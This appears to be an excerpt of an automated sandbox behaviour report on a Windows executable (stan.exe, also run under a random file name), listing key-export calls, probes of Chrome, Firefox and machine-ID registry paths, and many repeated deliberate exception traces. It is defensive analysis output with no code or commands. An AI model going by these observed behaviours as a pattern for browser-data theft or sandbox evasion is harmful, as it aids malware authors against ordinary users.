 buffer: <INVALID POINTER>
crypto_handle: 0x0081b238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b238
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0081b138
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid
file C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
file C:\Program Files\Mozilla Firefox\api-ms-win-core-file-l2-1-0.dll
registry HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\Google Chrome
registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\chrome.exe\PATH
registry HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
section
Time & API Arguments Status Return Repeated

__exception__

 stacktrace: 
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506760
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506788
registers.edx: 0
registers.ebx: 42742704
registers.esi: 5
registers.ecx: 42742704
1 0 0

__exception__

 stacktrace: 
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

 stacktrace: 
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

 stacktrace: 
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 0
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

 stacktrace: 
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

 stacktrace: 
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 2
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

 stacktrace: 
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 2
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

 stacktrace: 
stan+0x297ff8 @ 0xe67ff8
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506760
registers.edi: 1506760
registers.eax: 0
registers.ebp: 1506788
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506968
1 0 0

__exception__

 stacktrace: 
stan+0x298ba3 @ 0xe68ba3
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 13729792
1 0 0

__exception__

 stacktrace: 
stan+0x298ba3 @ 0xe68ba3
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298c7f @ 0xe68c7f
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 282235020
1 0 0

__exception__

 stacktrace: 
stan+0x298c7f @ 0xe68c7f
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298c7f @ 0xe68c7f
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298c7f @ 0xe68c7f
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298d51 @ 0xe68d51
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 1506740
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 3063651348
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298e4b @ 0xe68e4b
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298ee1 @ 0xe68ee1
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 15065228
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 9535488
registers.esi: 13729792
registers.ecx: 3322538752
1 0 0

__exception__

 stacktrace: 
stan+0x298ee1 @ 0xe68ee1
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe204
exception.instruction: ud2
exception.module: stan.exe
exception.exception_code: 0xc000001d
exception.offset: 2089476
exception.address: 0xdce204
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 2
registers.ebx: 14475759
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
stan+0x298ee1 @ 0xe68ee1
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: stan+0x1fe1d9
exception.instruction: div eax
exception.module: stan.exe
exception.exception_code: 0xc0000094
exception.offset: 2089433
exception.address: 0xdce1d9
registers.esp: 1506712
registers.edi: 1506712
registers.eax: 0
registers.ebp: 1506740
registers.edx: 0
registers.ebx: 14475802
registers.esi: 0
registers.ecx: 1506748
1 0 0

__exception__

 stacktrace: 
RtlpNtEnumerateSubKey+0x2a2b isupper-0x4e2b ntdll+0xcf559 @ 0x76fdf559
RtlpNtEnumerateSubKey+0x2b0b isupper-0x4d4b ntdll+0xcf639 @ 0x76fdf639
RtlUlonglongByteSwap+0xba5 RtlFreeOemString-0x20d35 ntdll+0x7df95 @ 0x76f8df95
HeapFree+0x14 GetProcessHeap-0xc kernel32+0x114dd @ 0x755c14dd
stan+0xf38bf @ 0xcc38bf
stan+0xea2de @ 0xcba2de
stan+0xdc00d @ 0xcac00d
stan+0x10a272 @ 0xcda272
stan+0xeec93 @ 0xcbec93
stan+0xeef47 @ 0xcbef47
stan+0xebb0a @ 0xcbbb0a
stan+0xeba36 @ 0xcbba36
stan+0xebbf8 @ 0xcbbbf8
stan+0xebd5f @ 0xcbbd5f
stan+0xdc393 @ 0xcac393
stan+0x148100 @ 0xd18100
stan+0x298fb3 @ 0xe68fb3
stan+0x29573a @ 0xe6573a
stan+0x2218dc @ 0xdf18dc

exception.instruction_r: eb 12 8b 45 ec 8b 08 8b 09 50 51 e8 6f ff ff ff
exception.symbol: RtlpNtEnumerateSubKey+0x1b25 isupper-0x5d31 ntdll+0xce653
exception.instruction: jmp 0x76fde667
exception.module: ntdll.dll
exception.exception_code: 0xc0000374
exception.offset: 845395
exception.address: 0x76fde653
registers.esp: 1505960
registers.edi: 2866280
registers.eax: 1505976
registers.ebp: 1506080
registers.edx: 0
registers.ebx: 0
registers.esi: 2686976
registers.ecx: 2147483647
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x74724387
NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x75c4ef51
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75c46b42
NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75c46a9c
NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75c65c3a
NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x75ce06b8
WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x747fd7e6
WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x747fd876
WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x747fddd0
CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x74718a43
CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x74718938
DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7471950a
WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x747fdccd
WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x747fdb41
WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x747fe1fd
DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x74719367
DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x74719326
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7585788a
CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x746da48b
CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x746d853b
CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x746da4ac
CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x746ecd48
CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x746ed87a
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 113308432
registers.edi: 95063068
registers.eax: 113308432
registers.ebp: 113308512
registers.edx: 31
registers.ebx: 113308796
registers.esi: 2147746133
registers.ecx: 95342760
1 0 0

__exception__

 stacktrace: 
RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x75c5374b
DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x747ff725
NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x75c6414b
ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x746cfe14
StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x747fa338
IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x761ae99f
IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x761872ed
RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x7617ab0d
GetIUriPriv2+0x603 CoInternetIsFeatureEnabledForIUri-0xdf6 urlmon+0x1ea98 @ 0x7617ea98
RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x761787f7
CopyStgMedium+0x286 FindMediaType-0x70d urlmon+0x1ba32 @ 0x7617ba32
gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x758562fa
GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75856d3a
CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x758577c4
DispatchMessageA+0xf GetMessageA-0x9 user32+0x17bca @ 0x75857bca
CreateAsyncBindCtx+0xb2f URLDownloadToCacheFileW-0x54c urlmon+0x4516f @ 0x761a516f
CreateAsyncBindCtx+0xa8e URLDownloadToCacheFileW-0x5ed urlmon+0x450ce @ 0x761a50ce
RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x7617a0d8
RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76179b85
RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76179aa8
CreateAsyncBindCtx+0xccc URLDownloadToCacheFileW-0x3af urlmon+0x4530c @ 0x761a530c
URLDownloadToCacheFileW+0xe5 CoInternetIsFeatureZoneElevationEnabled-0x2c18 urlmon+0x457a0 @ 0x761a57a0
DllCanUnloadNow+0xcfc8 IEAssociateThreadWithTab-0x294dd ieframe+0x2540c @ 0x7167540c
DllCanUnloadNow+0xce86 IEAssociateThreadWithTab-0x2961f ieframe+0x252ca @ 0x716752ca
CreateExtensionGuidEnumerator+0x5d622 SetQueryNetSessionCount-0x15f9a ieframe+0x100ea3 @ 0x71750ea3
RtlGetUserInfoHeap+0x225 RtlQueueWorkItem-0x210 ntdll+0x67e96 @ 0x76f77e96
TpCallbackIndependent+0x527 RtlIsCriticalSectionLockedByThread-0x240 ntdll+0x454f4 @ 0x76f554f4
BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x755c33ca
RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x76f49ed2
RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x76f49ea5

exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b
exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727
exception.instruction: leave
exception.module: KERNELBASE.dll
exception.exception_code: 0x80040155
exception.offset: 46887
exception.address: 0x7597b727
registers.esp: 77583968
registers.edi: 1953561104
registers.eax: 77583968
registers.ebp: 77584048
registers.edx: 1
registers.ebx: 7160388
registers.esi: 2147746133
registers.ecx: 1610980466
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bb2f0 @ 0xadb2f0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030440
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030468
registers.edx: 2
registers.ebx: 40580032
registers.esi: 5
registers.ecx: 40580032
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdbf6 @ 0xaddbf6
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: f7 f0 e8 f8 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x1261d9
exception.instruction: div eax
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc0000094
exception.offset: 1204697
exception.address: 0xa461d9
registers.esp: 2030392
registers.edi: 11362444
registers.eax: 0
registers.ebp: 2030420
registers.edx: 0
registers.ebx: 5832704
registers.esi: 10027008
registers.ecx: 10027008
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdbf6 @ 0xaddbf6
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
registers.eax: 0
registers.ebp: 2030420
registers.edx: 2
registers.ebx: 10772975
registers.esi: 0
registers.ecx: 2030428
1 0 0

__exception__

 stacktrace: 
vhanzrtsx6odxe2wledh+0x1bdbf6 @ 0xaddbf6
vhanzrtsx6odxe2wledh+0x1c05a0 @ 0xae05a0
vhanzrtsx6odxe2wledh+0x1498dc @ 0xa698dc

exception.instruction_r: 0f 0b e8 cd 2f 01 00 33 c0 5a 59 59 64 89 10 eb
exception.symbol: vhanzrtsx6odxe2wledh+0x126204
exception.instruction: ud2
exception.module: vhaNZRtsx6oDxE2wLedH.exe
exception.exception_code: 0xc000001d
exception.offset: 1204740
exception.address: 0xa46204
registers.esp: 2030392
registers.edi: 2030392
